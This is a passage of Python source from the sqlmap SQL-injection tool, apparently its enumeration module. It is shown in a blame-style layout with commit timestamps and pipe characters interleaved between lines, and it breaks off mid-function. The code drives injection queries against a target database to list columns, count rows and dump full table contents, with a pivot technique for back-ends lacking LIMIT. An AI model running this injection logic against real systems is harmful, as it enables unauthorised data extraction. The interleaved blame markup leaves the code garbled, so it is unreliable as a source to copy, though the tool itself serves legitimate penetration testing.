                        kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)][unsafeSQLIdentificatorNaming(tbl)] = columns
                    else:
                        kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)] = {unsafeSQLIdentificatorNaming(tbl): columns}

                return kb.data.cachedColumns

            message = "do you want to use common columns existence check? [Y/n/q]"
            test = readInput(message, default="Y")

            if test[0] in ("n", "N"):
                return
            elif test[0] in ("q", "Q"):
                raise sqlmapUserQuitException
            else:
                return columnExists(paths.COMMON_COLUMNS)

        rootQuery = queries[Backend.getIdentifiedDbms()].columns
        condition = rootQuery.blind.condition if 'condition' in rootQuery.blind else None

        if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
            for tbl in tblList:
                if conf.db is not None and len(kb.data.cachedColumns) > 0 \
                   and conf.db in kb.data.cachedColumns and tbl in \
                   kb.data.cachedColumns[conf.db]:
                    infoMsg = "fetched tables' columns on "
                    infoMsg += "database '%s'" % conf.db
                    logger.info(infoMsg)

                    return { conf.db: kb.data.cachedColumns[conf.db]}

                infoMsg = "fetching columns "

                if len(colList) > 0:
                    colConsider, colCondParam = self.likeOrExact("column")
                    condQueryStr = "%%s%s" % colCondParam
                    condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in colList)

                    if colConsider == "1":
                        infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in colList)
                    else:
                        infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in colList)
                else:
                    condQuery = ""

                infoMsg += "for table '%s' " % tbl
                infoMsg += "on database '%s'" % conf.db
                logger.info(infoMsg)

                if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
                    query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
                    query += condQuery
                elif Backend.isDbms(DBMS.ORACLE):
                    query = rootQuery.inband.query % unsafeSQLIdentificatorNaming(tbl.upper())
                    query += condQuery
                elif Backend.isDbms(DBMS.MSSQL):
                    query = rootQuery.inband.query % (conf.db, conf.db,
                                                      conf.db, conf.db,
                                                      conf.db, conf.db,
                                                      conf.db, unsafeSQLIdentificatorNaming(tbl))
                    query += condQuery.replace("[DB]", conf.db)
                elif Backend.isDbms(DBMS.SQLITE):
                    query = rootQuery.inband.query % tbl

                value = inject.getValue(query, blind=False)

                if Backend.isDbms(DBMS.SQLITE):
                    parseSqliteTableSchema(value)
                elif not isNoneValue(value):
                    table = {}
                    columns = {}

                    for columnData in value:
                        if not isNoneValue(columnData):
                            name = safeSQLIdentificatorNaming(columnData[0])

                            if len(columnData) == 1:
                                columns[name] = ""
                            else:
                                columns[name] = columnData[1]

                    if conf.db in kb.data.cachedColumns:
                        kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)][unsafeSQLIdentificatorNaming(tbl)] = columns
                    else:
                        table[unsafeSQLIdentificatorNaming(tbl)] = columns
                        kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)] = table
|
2011-02-19 17:56:58 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
if not kb.data.cachedColumns and not conf.direct:
|
|
|
|
for tbl in tblList:
|
|
|
|
if conf.db is not None and len(kb.data.cachedColumns) > 0 \
|
|
|
|
and conf.db in kb.data.cachedColumns and tbl in \
|
|
|
|
kb.data.cachedColumns[conf.db]:
|
|
|
|
infoMsg = "fetched tables' columns on "
|
|
|
|
infoMsg += "database '%s'" % conf.db
|
|
|
|
logger.info(infoMsg)
|
2011-02-19 17:56:58 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
return {conf.db: kb.data.cachedColumns[conf.db]}
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
infoMsg = "fetching columns "
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
if len(colList) > 0:
|
|
|
|
condQuery = " AND (%s)" % " OR ".join("%s LIKE '%%%s%%'" % (condition, unsafeSQLIdentificatorNaming(col)) for col in colList)
|
|
|
|
likeMsg = "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in colList)
|
|
|
|
infoMsg += likeMsg
|
|
|
|
else:
|
|
|
|
condQuery = ""
|
|
|
|
likeMsg = ""
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
infoMsg += "for table '%s' " % tbl
|
|
|
|
infoMsg += "on database '%s'" % conf.db
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
countMsg = "fetching number of columns %s" % likeMsg
|
|
|
|
countMsg += "for table '%s'" % tbl
|
|
|
|
countMsg += " on database '%s'" % conf.db
|
|
|
|
logger.info(countMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
|
2011-05-01 02:10:27 +04:00
|
|
|
query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
|
2010-01-10 03:21:03 +03:00
|
|
|
query += condQuery
|
2011-05-01 02:10:27 +04:00
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
elif Backend.isDbms(DBMS.ORACLE):
|
2011-05-01 02:10:27 +04:00
|
|
|
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(tbl.upper())
|
2010-01-10 03:21:03 +03:00
|
|
|
query += condQuery
|
2011-05-01 02:10:27 +04:00
|
|
|
|
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
|
|
|
query = rootQuery.blind.count % (conf.db, conf.db, \
|
|
|
|
unsafeSQLIdentificatorNaming(tbl))
|
2010-01-10 03:21:03 +03:00
|
|
|
query += condQuery.replace("[DB]", conf.db)
|
2011-05-01 02:10:27 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.FIREBIRD):
|
2011-05-01 02:10:27 +04:00
|
|
|
query = rootQuery.blind.count % (tbl)
|
2010-03-18 20:20:54 +03:00
|
|
|
query += condQuery
|
2010-01-10 03:21:03 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
elif Backend.isDbms(DBMS.SQLITE):
|
|
|
|
query = rootQuery.blind.query % tbl
|
|
|
|
value = inject.getValue(query, inband=False, error=False)
|
|
|
|
parseSqliteTableSchema(value)
|
|
|
|
return kb.data.cachedColumns
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
|
|
|
|
|
|
|
if not isNumPosStrValue(count):
|
|
|
|
errMsg = "unable to retrieve the number of columns "
|
|
|
|
errMsg += "for table '%s' " % tbl
|
|
|
|
errMsg += "on database '%s'" % conf.db
|
2011-05-01 03:20:16 +04:00
|
|
|
logger.error(errMsg)
|
|
|
|
|
|
|
|
continue
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
table = {}
|
|
|
|
columns = {}
|
2010-03-18 20:20:54 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
indexRange = getRange(count)
|
2010-03-18 20:20:54 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
for index in indexRange:
|
|
|
|
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
|
|
|
|
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
|
|
|
|
query += condQuery
|
|
|
|
field = None
|
2011-05-06 14:27:43 +04:00
|
|
|
elif Backend.isDbms(DBMS.ORACLE):
|
2011-05-01 02:10:27 +04:00
|
|
|
query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl.upper())
|
|
|
|
query += condQuery
|
|
|
|
field = None
|
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
|
|
|
query = rootQuery.blind.query % (conf.db, conf.db,
|
|
|
|
conf.db, conf.db,
|
|
|
|
conf.db, conf.db,
|
|
|
|
unsafeSQLIdentificatorNaming(tbl))
|
|
|
|
query += condQuery.replace("[DB]", conf.db)
|
|
|
|
field = condition.replace("[DB]", conf.db)
|
|
|
|
elif Backend.isDbms(DBMS.FIREBIRD):
|
|
|
|
query = rootQuery.blind.query % (tbl)
|
|
|
|
query += condQuery
|
|
|
|
field = None
|
|
|
|
|
|
|
|
query = agent.limitQuery(index, query, field)
|
|
|
|
column = inject.getValue(query, inband=False, error=False)
|
|
|
|
|
|
|
|
if not onlyColNames:
|
|
|
|
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
|
|
|
|
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db))
|
2011-05-06 14:27:43 +04:00
|
|
|
elif Backend.isDbms(DBMS.ORACLE):
|
2011-05-01 02:10:27 +04:00
|
|
|
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column)
|
|
|
|
elif Backend.isDbms(DBMS.MSSQL):
|
|
|
|
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db,
|
|
|
|
conf.db, column, conf.db,
|
|
|
|
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl))
|
|
|
|
elif Backend.isDbms(DBMS.FIREBIRD):
|
|
|
|
query = rootQuery.blind.query2 % (tbl, column)
|
|
|
|
|
|
|
|
colType = inject.getValue(query, inband=False, error=False)
|
|
|
|
|
|
|
|
if Backend.isDbms(DBMS.FIREBIRD):
|
|
|
|
colType = firebirdTypes[colType] if colType in firebirdTypes else colType
|
|
|
|
|
|
|
|
column = safeSQLIdentificatorNaming(column)
|
|
|
|
columns[column] = colType
|
|
|
|
else:
|
|
|
|
column = safeSQLIdentificatorNaming(column)
|
|
|
|
columns[column] = None
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
if columns:
|
|
|
|
if conf.db in kb.data.cachedColumns:
|
2011-05-08 06:08:18 +04:00
|
|
|
kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)][unsafeSQLIdentificatorNaming(tbl)] = columns
|
2011-05-01 02:10:27 +04:00
|
|
|
else:
|
2011-05-08 06:08:18 +04:00
|
|
|
table[unsafeSQLIdentificatorNaming(tbl)] = columns
|
|
|
|
kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)] = table
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
if not kb.data.cachedColumns:
|
2011-05-01 02:10:27 +04:00
|
|
|
errMsg = "unable to retrieve the columns for any "
|
|
|
|
errMsg += "table on database '%s'" % conf.db
|
2011-05-01 03:20:16 +04:00
|
|
|
logger.error(errMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
return kb.data.cachedColumns
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-30 02:37:43 +04:00
|
|
|
def getSchema(self):
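# Enumerates the whole back-end schema: conf.db/tbl/col are pushed and
# cleared, all tables are retrieved via self.getTables(), then the columns
# of every cached table are fetched before the original conf values are
# restored and kb.data.cachedColumns is returned.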
|
|
|
|
infoMsg = "enumerating database management system schema"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
pushValue(conf.db)
|
|
|
|
pushValue(conf.tbl)
|
2011-05-01 02:10:27 +04:00
|
|
|
pushValue(conf.col)
|
2011-04-30 02:37:43 +04:00
|
|
|
|
|
|
|
conf.db = None
|
|
|
|
conf.tbl = None
|
2011-05-01 02:10:27 +04:00
|
|
|
conf.col = None
|
|
|
|
kb.data.cachedTables = {}
|
|
|
|
kb.data.cachedColumns = {}
|
2011-04-30 02:37:43 +04:00
|
|
|
|
|
|
|
self.getTables()
|
|
|
|
|
|
|
|
infoMsg = "fetched tables: "
|
2011-05-26 18:30:05 +04:00
|
|
|
infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if \
|
2011-04-30 02:37:43 +04:00
|
|
|
Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \
|
2011-05-26 18:30:05 +04:00
|
|
|
else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \
|
2011-04-30 02:37:43 +04:00
|
|
|
kb.data.cachedTables.items()])
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
for db, tables in kb.data.cachedTables.items():
|
|
|
|
for tbl in tables:
|
|
|
|
conf.db = db
|
|
|
|
conf.tbl = tbl
|
|
|
|
|
|
|
|
self.getColumns()
|
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
conf.col = popValue()
|
2011-04-30 02:37:43 +04:00
|
|
|
conf.tbl = popValue()
|
|
|
|
conf.db = popValue()
|
|
|
|
|
|
|
|
return kb.data.cachedColumns
|
|
|
|
|
2011-04-30 04:22:22 +04:00
|
|
|
def __tableGetCount(self, db, table):
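# Retrieves COUNT(*) for a single db.table and stores it in
# kb.data.cachedCounts, keyed first by database name and then by the
# retrieved row count (mapping to the list of tables with that count).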
|
|
|
|
query = "SELECT COUNT(*) FROM %s.%s" % (safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(table, True))
|
|
|
|
count = inject.getValue(query, expected=EXPECTED.INT, charsetType=2)
|
|
|
|
|
|
|
|
if count is not None and isinstance(count, basestring) and count.isdigit():
|
|
|
|
if unsafeSQLIdentificatorNaming(db) not in kb.data.cachedCounts:
|
|
|
|
kb.data.cachedCounts[unsafeSQLIdentificatorNaming(db)] = {}
|
|
|
|
|
|
|
|
if int(count) in kb.data.cachedCounts[unsafeSQLIdentificatorNaming(db)]:
|
|
|
|
kb.data.cachedCounts[unsafeSQLIdentificatorNaming(db)][int(count)].append(unsafeSQLIdentificatorNaming(table))
|
|
|
|
else:
|
|
|
|
kb.data.cachedCounts[unsafeSQLIdentificatorNaming(db)][int(count)] = [unsafeSQLIdentificatorNaming(table)]
|
|
|
|
|
|
|
|
def getCount(self):
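# Retrieves the number of entries for the table(s) given with -T (or, when
# -T is missing, for every table of every enumerable database) and returns
# the populated kb.data.cachedCounts structure.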
|
|
|
|
if not conf.tbl:
|
|
|
|
warnMsg = "missing table parameter, sqlmap will retrieve "
|
|
|
|
warnMsg += "the number of entries for all database "
|
|
|
|
warnMsg += "management system databases' tables"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
elif "." in conf.tbl:
|
|
|
|
if not conf.db:
|
|
|
|
conf.db, conf.tbl = conf.tbl.split(".")
|
|
|
|
|
|
|
|
if conf.tbl is not None and conf.db is None:
|
|
|
|
warnMsg = "missing database parameter, sqlmap is going to "
|
|
|
|
warnMsg += "use the current database to retrieve the "
|
|
|
|
warnMsg += "number of entries for table '%s'" % conf.tbl
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
conf.db = self.getCurrentDb()
|
2011-04-30 04:22:22 +04:00
|
|
|
|
|
|
|
self.forceDbmsEnum()
|
|
|
|
|
|
|
|
if conf.tbl:
|
|
|
|
for table in conf.tbl.split(","):
|
|
|
|
self.__tableGetCount(conf.db, table)
|
|
|
|
else:
|
|
|
|
self.getTables()
|
|
|
|
|
|
|
|
for db, tables in kb.data.cachedTables.items():
|
|
|
|
for table in tables:
|
|
|
|
self.__tableGetCount(db, table)
|
|
|
|
|
|
|
|
return kb.data.cachedCounts
|
|
|
|
|
2011-02-19 17:56:58 +03:00
|
|
|
def __pivotDumpTable(self, table, colList, count=None, blind=True):
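# Dumps table rows on back-ends lacking a usable LIMIT/OFFSET mechanism
# (used for MSSQL, Sybase, Access and MaxDB). A column whose number of
# distinct values equals the row count is chosen as pivot and rows are
# walked with successive "greater than last pivot value" comparisons via
# dumpNode.query/query2 - roughly of the shape
# SELECT MIN(pivot) FROM table WHERE pivot > '<last value>'
# (illustrative only; the exact statements come from the per-DBMS
# dump_table.blind queries).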
|
2011-02-19 03:36:47 +03:00
|
|
|
lengths = {}
|
|
|
|
entries = {}
|
|
|
|
|
2011-02-19 17:56:58 +03:00
|
|
|
dumpNode = queries[Backend.getIdentifiedDbms()].dump_table.blind
|
|
|
|
|
2011-02-19 03:36:47 +03:00
|
|
|
validColumnList = False
|
|
|
|
validPivotValue = False
|
|
|
|
|
2011-02-19 17:56:58 +03:00
|
|
|
if not count:
|
|
|
|
query = dumpNode.count % table
|
|
|
|
if blind:
|
|
|
|
count = inject.getValue(query, inband=False, error=False)
|
|
|
|
else:
|
|
|
|
count = inject.getValue(query, blind=False)
|
|
|
|
|
2011-05-23 23:16:29 +04:00
|
|
|
if count == "0":
|
|
|
|
infoMsg = "table '%s' appears to be empty" % table
|
2011-04-15 01:11:20 +04:00
|
|
|
logger.info(infoMsg)
|
2011-05-23 23:16:29 +04:00
|
|
|
|
|
|
|
for column in colList:
|
|
|
|
lengths[column] = len(column)
|
|
|
|
entries[column] = []
|
|
|
|
|
|
|
|
return entries, lengths
|
|
|
|
elif not count:
|
|
|
|
return None
|
2011-04-15 01:11:20 +04:00
|
|
|
|
2011-04-29 18:33:47 +04:00
|
|
|
for column in colList:
|
|
|
|
lengths[column] = 0
|
|
|
|
entries[column] = []
|
|
|
|
|
2011-04-11 15:59:02 +04:00
|
|
|
colList = sorted(colList, key=lambda x: len(x) if x else MAX_INT)
|
2011-04-11 13:40:52 +04:00
|
|
|
|
2011-02-19 12:40:41 +03:00
|
|
|
for column in colList:
|
|
|
|
infoMsg = "fetching number of distinct "
|
|
|
|
infoMsg += "values for column '%s'" % column
|
|
|
|
logger.info(infoMsg)
|
2011-02-19 03:36:47 +03:00
|
|
|
|
2011-02-19 12:40:41 +03:00
|
|
|
query = dumpNode.count2 % (column, table)
|
2011-03-23 14:36:40 +03:00
|
|
|
|
2011-02-19 12:40:41 +03:00
|
|
|
if blind:
|
|
|
|
value = inject.getValue(query, inband=False, error=False)
|
|
|
|
else:
|
|
|
|
value = inject.getValue(query, blind=False)
|
2011-02-19 03:36:47 +03:00
|
|
|
|
2011-02-19 12:40:41 +03:00
|
|
|
if isNumPosStrValue(value):
|
|
|
|
validColumnList = True
|
2011-04-29 18:33:47 +04:00
|
|
|
|
2011-02-19 12:40:41 +03:00
|
|
|
if value == count:
|
|
|
|
infoMsg = "using column '%s' as a pivot " % column
|
|
|
|
infoMsg += "for retrieving row data"
|
|
|
|
logger.info(infoMsg)
|
2011-02-19 03:36:47 +03:00
|
|
|
|
2011-02-19 12:40:41 +03:00
|
|
|
validPivotValue = True
|
2011-02-19 03:36:47 +03:00
|
|
|
|
2011-02-19 12:40:41 +03:00
|
|
|
colList.remove(column)
|
|
|
|
colList.insert(0, column)
|
|
|
|
break
|
2011-02-19 03:36:47 +03:00
|
|
|
|
|
|
|
if not validColumnList:
|
|
|
|
errMsg = "all column name(s) provided are non-existent"
|
|
|
|
raise sqlmapNoneDataException, errMsg
|
|
|
|
|
|
|
|
if not validPivotValue:
|
|
|
|
warnMsg = "no proper pivot column provided (with unique values)."
|
|
|
|
warnMsg += " all rows can't be retrieved."
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
pivotValue = " "
|
|
|
|
breakRetrieval = False
|
|
|
|
|
2011-04-15 18:21:13 +04:00
|
|
|
try:
|
|
|
|
for i in xrange(int(count)):
|
|
|
|
if breakRetrieval:
|
|
|
|
break
|
2011-02-19 03:36:47 +03:00
|
|
|
|
2011-04-15 18:21:13 +04:00
|
|
|
for column in colList:
|
|
|
|
if column == colList[0]:
|
|
|
|
# Correction for pivotValues with unrecognized chars
|
|
|
|
if pivotValue and '?' in pivotValue and pivotValue[0] != '?':
|
|
|
|
pivotValue = pivotValue.split('?')[0]
|
|
|
|
pivotValue = pivotValue[:-1] + chr(ord(pivotValue[-1]) + 1)
|
|
|
|
query = dumpNode.query % (column, table, column, pivotValue)
|
|
|
|
else:
|
|
|
|
query = dumpNode.query2 % (column, table, colList[0], pivotValue)
|
|
|
|
|
|
|
|
if blind:
|
|
|
|
value = inject.getValue(query, inband=False, error=False)
|
2011-02-19 03:36:47 +03:00
|
|
|
else:
|
2011-04-15 18:21:13 +04:00
|
|
|
value = inject.getValue(query, blind=False)
|
|
|
|
|
|
|
|
if column == colList[0]:
|
2011-06-06 13:55:22 +04:00
|
|
|
if isNoneValue(value):
|
2011-04-15 18:21:13 +04:00
|
|
|
breakRetrieval = True
|
|
|
|
break
|
|
|
|
else:
|
|
|
|
pivotValue = safechardecode(value)
|
|
|
|
|
2011-05-26 19:16:57 +04:00
|
|
|
if all([conf.limitStart, conf.limitStop]):
|
|
|
|
if (i + 1) < conf.limitStart:
|
2011-05-26 19:23:28 +04:00
|
|
|
warnMsg = "skipping first %d pivot " % conf.limitStart
|
|
|
|
warnMsg += "point values"
|
2011-06-08 18:35:23 +04:00
|
|
|
singleTimeWarnMessage(warnMsg)
|
2011-05-26 19:16:57 +04:00
|
|
|
break
|
|
|
|
elif (i + 1) > conf.limitStop:
|
|
|
|
breakRetrieval = True
|
|
|
|
break
|
|
|
|
|
2011-04-15 18:21:13 +04:00
|
|
|
lengths[column] = max(lengths[column], len(value) if value else 0)
|
|
|
|
entries[column].append(value)
|
|
|
|
|
|
|
|
except KeyboardInterrupt:
|
|
|
|
warnMsg = "user aborted during enumeration. sqlmap "
|
|
|
|
warnMsg += "will display partial output"
|
|
|
|
logger.warn(warnMsg)
|
2011-02-19 03:36:47 +03:00
|
|
|
|
2011-04-15 18:21:13 +04:00
|
|
|
except sqlmapConnectionException, e:
|
|
|
|
errMsg = "connection exception detected. sqlmap "
|
|
|
|
errMsg += "will display partial output"
|
|
|
|
errMsg += "'%s'" % e
|
|
|
|
logger.critical(errMsg)
|
2011-02-19 03:36:47 +03:00
|
|
|
|
2011-02-19 12:36:57 +03:00
|
|
|
return entries, lengths
|
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
def dumpTable(self):
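# Dumps the entries of the table(s) given with -T (or of all tables of
# conf.db): column names are enumerated first, then rows are retrieved
# either in one shot (UNION/error-based/direct) or value by value in blind
# mode, with __pivotDumpTable() used as fallback for DBMSes without proper
# LIMIT support; the result is collected in kb.data.dumpedTable and passed
# to conf.dumper.dbTableValues().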
|
|
|
|
self.forceDbmsEnum()
|
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if conf.db is None or conf.db == "CD":
|
|
|
|
if conf.db is None:
|
|
|
|
warnMsg = "missing database parameter, sqlmap is going "
|
|
|
|
warnMsg += "to use the current database to enumerate "
|
|
|
|
warnMsg += "table(s) entries"
|
|
|
|
logger.warn(warnMsg)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
conf.db = self.getCurrentDb()
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
elif conf.db is not None:
|
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
|
|
|
conf.db = conf.db.upper()
|
2011-01-02 14:01:20 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if ',' in conf.db:
|
|
|
|
errMsg = "only one database name is allowed when enumerating "
|
|
|
|
errMsg += "the tables' columns"
|
|
|
|
raise sqlmapMissingMandatoryOptionException, errMsg
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
conf.db = safeSQLIdentificatorNaming(conf.db)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if conf.tbl:
|
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
|
|
|
conf.tbl = conf.tbl.upper()
|
2011-01-10 13:30:17 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
tblList = conf.tbl.split(",")
|
2010-12-27 14:36:36 +03:00
|
|
|
else:
|
2011-05-08 06:08:18 +04:00
|
|
|
self.getTables()
|
2010-12-18 01:23:01 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if len(kb.data.cachedTables) > 0:
|
|
|
|
tblList = kb.data.cachedTables.values()
|
2010-12-18 01:23:01 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if isinstance(tblList[0], (set, tuple, list)):
|
|
|
|
tblList = tblList[0]
|
|
|
|
else:
|
|
|
|
errMsg = "unable to retrieve the tables"
|
|
|
|
errMsg += "on database '%s'" % conf.db
|
|
|
|
raise sqlmapNoneDataException, errMsg
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
for tbl in tblList:
|
|
|
|
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
for tbl in tblList:
|
|
|
|
conf.tbl = tbl
|
|
|
|
kb.data.cachedColumns = {}
|
|
|
|
kb.data.dumpedTable = {}
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
self.getColumns(onlyColNames=True)
|
2011-02-15 03:28:27 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
try:
|
|
|
|
if unsafeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns \
|
|
|
|
or unsafeSQLIdentificatorNaming(tbl) not in \
|
2011-05-19 21:35:33 +04:00
|
|
|
kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)] \
|
|
|
|
or not kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)][unsafeSQLIdentificatorNaming(tbl)]:
|
2011-05-08 06:08:18 +04:00
|
|
|
warnMsg = "unable to enumerate the columns for table "
|
|
|
|
warnMsg += "'%s' on database" % unsafeSQLIdentificatorNaming(tbl)
|
|
|
|
warnMsg += " '%s', skipping" % unsafeSQLIdentificatorNaming(conf.db)
|
|
|
|
logger.warn(warnMsg)
|
2011-02-15 03:28:27 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
continue
|
2011-02-15 03:28:27 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
colList = kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)][unsafeSQLIdentificatorNaming(tbl)].keys()
|
|
|
|
colString = ", ".join(column for column in colList)
|
|
|
|
rootQuery = queries[Backend.getIdentifiedDbms()].dump_table
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
infoMsg = "fetching"
|
|
|
|
if conf.col:
|
2011-05-19 21:35:33 +04:00
|
|
|
infoMsg += " column(s) '%s'" % colString
|
2011-05-08 06:08:18 +04:00
|
|
|
infoMsg += " entries for table '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
|
|
|
infoMsg += " on database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
|
|
|
logger.info(infoMsg)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
entriesCount = 0
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if any([isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION), isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR), conf.direct]):
|
|
|
|
entries = []
|
|
|
|
query = None
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if all([Backend.isDbms(DBMS.MYSQL), isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR), conf.groupConcat]):
|
|
|
|
randStr, randStr2 = randomStr(), randomStr()
|
|
|
|
filterFunction = "REPLACE(REPLACE(IFNULL(%s, ' '),'%s','%s'),'%s','%s')"\
|
|
|
|
% ('%s', CONCAT_VALUE_DELIMITER, randStr, CONCAT_ROW_DELIMITER, randStr2)
|
|
|
|
concats = ",".join(map(lambda x: "CONCAT(%s, '|')" % (filterFunction % x), colList[:-1]))
|
|
|
|
concats += ",%s" % (filterFunction % colList[-1])
|
|
|
|
query = "SELECT GROUP_CONCAT(%s) FROM %s.%s" % (concats, conf.db, tbl)
|
|
|
|
value = inject.getValue(query, blind=False)
|
|
|
|
if isinstance(value, basestring):
|
|
|
|
for line in value.split(CONCAT_ROW_DELIMITER):
|
|
|
|
row = line.split(CONCAT_VALUE_DELIMITER)
|
|
|
|
row = map(lambda x: x.replace(randStr, CONCAT_VALUE_DELIMITER).replace(randStr2, CONCAT_ROW_DELIMITER), row)
|
|
|
|
entries.append(row)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
|
|
|
query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())))
|
|
|
|
elif Backend.isDbms(DBMS.SQLITE):
|
|
|
|
query = rootQuery.inband.query % (colString, tbl)
|
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL):
|
|
|
|
# Partial inband and error
|
2011-05-26 19:16:57 +04:00
|
|
|
